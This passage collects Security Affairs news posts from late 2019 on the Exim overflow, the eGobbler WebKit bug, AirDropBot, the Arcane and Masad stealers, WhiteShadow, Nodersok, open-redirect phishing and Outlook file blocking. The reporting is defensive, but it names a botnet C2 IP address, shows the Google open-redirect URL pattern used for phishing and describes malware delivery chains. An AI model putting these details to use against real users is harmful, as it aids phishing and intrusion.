“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams, the latter answered within the hour while on August 9 the former responded that they were investigating.

On August 12, the Chrome team provided an update that a patch was submitted to WebKit on August 9:

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery network (CDNs) used by eGobbler threat actor to delivery the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat (string.c). An attacker could exploit the flaw using an extraordinary long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (stringc). The currently known exploit uses extraordinary long EHLO string to crash the Exim process that is receiving the message. While this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of Exim Development Team, it affects all versions of the Exim email server software from 4.92 up to and the version 4.92.2. The expert also released a PoC exploit for this vulnerability.

Early September, the Exim development team has addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects version 4.92.1 and prior of Exim mail server that accepts TLS connections. The vulnerability affects both GnuTLS and OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.

The major Linux distributions, including UbuntuArch LinuxFreeBSDDebian, and Fedora, already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward it was worth it: unixfreaxjp is return, with a new, great page of reverse engeeniring published on the MalwareMustDie blog post: “MMD-0064-2019 – Linux/AirDropBot

And this is not only “the” Odisseus’s opinion, just because I can be addressed as a member of  MalwareMustDie crew: this last post IT IS a masterpiece technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices in order to reverse Linux malware binaries (Intel and not Intel platforms), providing to every whitehat reverser many references and howtos to deal with ELF Linux malware, mixing theory and practice and showing how is incredibly useful the use of Radare r2 and Tsurgi distribution.

Don’t know if is because I have asked to my friend unixfreaxjp many times to publicly show how Radare r2 can be be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in many reverse engineering tutorials that are available on Youtube.

In fact this time we have not a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even if they are “indeed” stripped.

Unixfreaxjp step by step leads the reader to understand how a malware code is build, which are the methods, which are the secrets, with are the hidden techniques used by the coders to hide and encrypt as much as possible the C2 address, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story when my very good friend @0xrb found in his honeypot this new “Mirai like” Linux malware, which has important differences with the Mirai implementation. He understood immediately that there was something strange in this new “Mirai variant”, to proposing the sample to MalwareMustDie team: here it is his early tweet.

It is possible to give a look also to the logs of the malware that @0xrb published on Pastebin: here a lot of information is made available during the running phase. One of them, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb has successfully submitted the sample to MalwareMustDie team in order to better analyze it, and the result is another great page of Linux malware reversing, that every malware analyst should read and re-read.

We will overfly the technical analysis because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux developed malware aiming internet of things is happening a lot, and as previously mentioned, it has been driven by the money scheme that is fueling its botnet ecosystem as per previously posted in Security Affairs, this is still the main reason why new freshly coded malware in this sector is always coming up.

First spotted in the internet on August 3rd, 2019, a new Linux/AirDropBot has been reported, is a malware that has been built to aim many embedded Linux OS platform, it is meant to propagate its botnet into several originally coded and built for aiming the IoT used platforms. It’s still not in the final stage of development judging from some uncoded functions,  but the adversary mission is clear, to get as much Linux IoT infected as possible and get rid of his competitors. It was first detected as Mirai or Gafgyt like during the detection spotted in the first series of samples, and this may make researchers in Linux malware ignored its first existence.

So many processors are aimed by the malware, but if CPU like ARC Cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze CPU is aimed along with other generic cross-compiled CPU (MIPS/ARM/PPC/SPARC/Intel), the herder meant serious business to “pwn” the reachable IoTs. The binary is having two categories, the one that acts as bots and meant to infect the small devices and for bigger systems it has the worm-like vulnerability scanner aims CGI page on routers (in this version is aiming HTTP port 8080 on specific product CGI file) that can infect itself in a worm-like style along with the telnet scanning basis (attacking TCP port 23 or 2323).

The analysis made in MalwareMustDie blog’s recent post “MMD-0064-2019 – Linux/AirDropBot” is showing the latest binary sets, used by the adversaries behind this botnet. Scanner function for exploiting a certain router’s vulnerability is hardcoded and this threat is also aiming at other exploit too on older samples delivery. The overall idea is a known ones but the code is newly made.

Final considerations on the behavior to take in order to face this threat.

Internet of things are on improvement for its security quality, and governments all over the globe are seriously handling this, for example in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan, in the UK a voluntary code of practice (CoP) to help manufacturers boost the security of internet-connected devices that make up the internet of things (IoT) has been published, or in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet, there are a lot of products to handle and vulnerabilities for these products which are also researched at the same time by adversaries.
This makes IoT threat is still making a lot of issues since day-by-day new exploit issue actually comes up, old issues are re-used, unpatched segments are revealed and aimed.

Are we the wrong track then? I don’t think so. Yes, the process takes time and what we can do is keep on improving the detection on a new threat, containment, and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal works on stopping adversaries. If we are committing to keep on doing these steps the adversaries will find more demerits than merits to keep on hammering is with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Iran’s oil ministry said that the Government of Washington has launched a full-scale economic war” against the Islamic republic.

In the middle-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia of further attacks. The Iran-aligned Houthi rebel movement fights the Yemeni government and a coalition of regional countries led by Saudi Arabia that fights the rebels since 2015, when President Abdrabbuh Mansour Hadi was was kicked out of Sanaa by the Houthis.

Secretary of State Mike Pompeo blamed Iran for coordinated the attacks, it added that we are facing an unprecedented attack on the world’s energy supply.

Riyadh, Berlin, London, and Paris also blame Teheran for attacks that caused severe damages to the Saudi oil sector on September 14.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response. President Trump opted out for an intensification of economic sanctions against Teheran.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is onoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system, browser information, cryptocurrency wallets and instant-messaging sessions from Telegram, Discord, and Pidgin, data (i.e. passwords, cookies and forms) from a several of browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could be used to steal documents, collect Steam gaming community data, logs detected virtual machine IPs, and data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

Arcane Stealer V

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man that says to suffer a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will immediately block other file extensions for its Outlook web users, it will impossible for them to download this type of attachments.

Microsoft pointed out that the newly blocked file types are rarely used, this means that most organizations will face no problems with the change.

The list of file types that will be blocked by Microsoft include ones used by popular programing languages such as “.py“, “.pyc“, “.pyo“, “.pyw“, “.pyz“, “.pyzw” (used by Python); “.ps1″, “.ps1xml”, “.ps2″, “.ps2xml”, “.psc1″, “.psc2″, “.psd1″, “.psdm1″, “.psd1″, “.psdm1″, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft announced it will block also “.appcontent-ms“, “.settingcontent-ms“, “.cnt“, “.hpj“, “.website”, “.webpnp“, “.mcf“, “.printerexport“, “.pl“, “.theme”, “.vbp“, “.xbap“, “.xll“, “.xnk“, “.msu“, “.diagcab” and “.grp“.

Other file types that will be blocked by the tech giant are the ones having the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows sandbox, and the “.cer“, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft.”While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp”

In case organizations have to allow for the use of a particular file type, admins could add specific extensions to the AllowedFileTypes property of users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

$policy = Get-OwaMailboxPolicy [policy name]
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customer’s data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)

The post Microsoft will add new file types to the list of blocked ones in Outlook on the Web appeared first on Security Affairs.

Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites that anyway are able to bypass security filters because they appear as legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place. reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of Google open redirect is https://www.google.com/url?q=[url] that could be abused by attackers.

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below an example of a phishing message that uses Google open redirect that points to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant on open redirects.

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)


The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portugues hacker faces hundreds of Charges in Football Leaks case
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? Whats Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence ‘s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attack in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT, over the time researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enables, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors. 

The result of the query is written to disk as a PKZip archive of a Windows executable. 

WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”

whiteshadow

Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at the Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is actively distributed. The malware could steals files, browser information, and cryptocurrency wallet data and send them to the botmasters using a Telegram.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

Masad Stealer sends all of the information it collects – and receive commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

The Masad Stealer is written in Autoit scripts and is compiled into a Windows executable. The size of most of the samples analyzed by the experts was about 1.5 MiB, but experts revealed that it is possible to find larger executables bundled into other applications. 

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper, the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed masquerading it as a legitimate tool or bundling it into third party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected installing tainted versions of popular software and game cracks, and cheats.

Once infected a machine, Masad Stealer will collect a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, Cryptocurrency Wallets, browser cookies, usernames, passwords, and Credit Card Browser Data.

Masad Stealer is also able to automatically replaces MoneroBitcoin Cash, Litecoin, Neo, and Web Money cryptocurrency wallets from the clipboard with its own.

The malware achieves persistence by creating a scheduled task on all Windows devices it manages. 

Once the malware has collected the information from the victims’ computers will zip them using a 7zip executable bundled within its binary, then it will exfiltrat the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of unique Telegram bot IDs and usernames associated to the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there where 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors – or at least the number of different campaigns being run using the Masad Stealer malware – and the size of their operations.” continues the report.

Juniper Threat Labs pointed out that Masad Stealer is an active threat and the malicious code is still available for purchase on the black market.

Experts also published a list of indicators of compromise (IOCs) with malware sample hashes and domains involved in the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Masad Stealer Malware exfiltrates data via Telegram appeared first on Security Affairs.

Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuse of legitimate tools also called living-off-the-land binaries (LOLBins). Researchers observed threat actors dropping two legitimate tools onto the infected machines, namely Node.exe, the Windows implementation of the popular Node.js framework, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe, they are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.

Nodersok campaign

The attack chain starts when the users run an HTML Application (HTA) that is delivered likely through compromised advertisements. The JavaScript code in the HTA file downloads a second state component that launches a Powershell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers leverage lksktWinDivert tool is used to intercept packets sent out to initiate a TCP connection and modify them in a manner that likely benefits the attackers.

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)

The post Nodersok malware delivery campaign relies on advanced techniques appeared first on Security Affairs.

German police arrest suspects in raid network hosting Darknet marketplaces

German police have shut down a network hosting Darknet marketplaces focused on the trading of drugs, stolen data and child pornography.

German police announced to have shut down a network hosting Darknet black marketplaces trading drugs, stolen data, and child pornography.

The black marketplaces were also offering stolen data and fake documents, and other illegal goods.

Authorities conducted an investigation on the operators of the “Bulletproof Hoster” service that was provided through servers hidden in a former NATO bunker, the so-called “Cyber Bunker.”

Law enforcement arrested seven suspects were arrested in a series of raids, four Dutch citizens, two Germans and one Bulgarian.

“Thursday’s raids involved hundreds of officers and came after years of following up on leads in cooperation with other agencies. Police believe that the data center was involved in a hack attack three years ago on the national communications provider, Telekom.” reported the DW agency.

“Officials said the server seized on Thursday had also hosted the second-largest darknet trading platform, Wall Street Market.  Authorities in the European Union and the US shut that platform down in May, claiming it was used to traffick stolen data, forged documents, computer malware and illicit drugs.”

According to prosecutors, the criminal ring behind the illegal network was composed at least thirteen members, 12 men and one woman, aged from 20 to 59. The suspects ran the powerful servers inside the former NATO bunker in the town of Traben-Trarbach in Rhineland-Palatinate state.

The operation involved hundred police agents in Germany and other European countries, they seized 200 servers, numerous data carriers and mobile phones and a large sum of cash.

The police also confirmed that the popular “Wall Street Market” black marketplace was hosted on the seized server. In May, the German police, with the support of Europol, Dutch police and the FBI, has shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nation suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also allowed to arrest of two major suppliers of illegal narcotics in the United States.

Prosecutors also revealed that the same cyber bunker was used to host the C2 behind a botnet involved in a massive attack that hit the German provider Deutsche Telekom in November 2016.

Pierluigi Paganini

(SecurityAffairs – darknet, hacking)

The post German police arrest suspects in raid network hosting Darknet marketplaces appeared first on Security Affairs.

Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada

A series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC) causing the disruption of their information technology systems.

This month a series of cyber attack hit defense contractors Rheinmetall AG and Defence Construction Canada (DCC) disrupting their information technology systems.

German Rheinmetall AG is a market leader in the supply of military technology, in 2019 the group generated sales of $6.9 billion. DCC is a Crown corporation that delivers infrastructure and environmental projects for the defence of Canada

A malware-based attacks hit the IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico, and the USA since late on the evening of 24 September 2019.

The attacks impacted the production processes at these plants causing significant disruption.

“The IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico and the USA has been affected by malware attacks since late on the evening of 24 September 2019. As a result, normal production processes at these locations are currently experiencing significant disruption.” reads a press release published by the company.

“According to the latest information, the Group’s other IT systems have not been affected.”

Rheinmetall AG claims it is doing everything in its power to address the resulting disruption.

The company said assured deliverability in the short term, but at the time it is not possible to predict the length of the disruption.

“The most likely scenarios suggest a period lasting between two and four weeks.” continues the press release. “As things stand, the Group expects the malware event to have an adverse impact on operating results of between €3 million and €4 million per week starting with week two.”

Early this month, a cyberattack also disrupted the information technology systems of Defence Construction Canada.

“The Crown Corporation that manages Defence department projects and infrastructure has been hit with a cyber-attack.” reported the Ottawa Sun interview.

“Industry sources say an attack earlier this month disrupted Defence Construction Canada’s computer systems and has led to ongoing issues with procurement and other projects.”

DCC is still working to restore the IT systems and launched an investigation in the cyber attack, the organization pointed out that there are no delays to projects that it is managing on behalf of DND.

“All DCC site offices across Canada are open and work has continued on all projects that DCC is managing on behalf of DND and its other clients, she noted in an email.” continues the post.

“There are no delays to projects that DCC is managing on behalf of DND due to this incident,” said Stephanie Ryan, director of communications with Defence Construction Canada.

At the time there are no technical details about both cyber attacks, experts believe that the systems were infected by ransomware that caused the disruption of internal operations.

Pierluigi Paganini

(SecurityAffairs – Rheinmetall, hacking)

The post Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada appeared first on Security Affairs.

After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk

Researchers are warning of a new variant of recently disclosed SimJacker attack, dubbed WIBattack, that could expose millions of mobile phones to remote hacking.

WIBattack is a new variant of the recently discovered Simjacker attack method that could expose millions of mobile phones to remote hacking.

A couple of weeks ago, cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm was aware of the zero-day flaw since at least two years and is actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

Following the disclosure of the Simjacker attack, the researcher Lakatos from Ginno Security Lab discovered that another dynamic SIM toolkit, called Wireless Internet Browser (WIB), can be exploited in a similar way.

Lakatos first discovered this vulnerability back in 2015, but he did not publicly disclose the flaw is hard to patch and it could be abused by threat actors to remotely take over the phones running vulnerable SIMs.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.” reads a blog post published by the researcher.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.

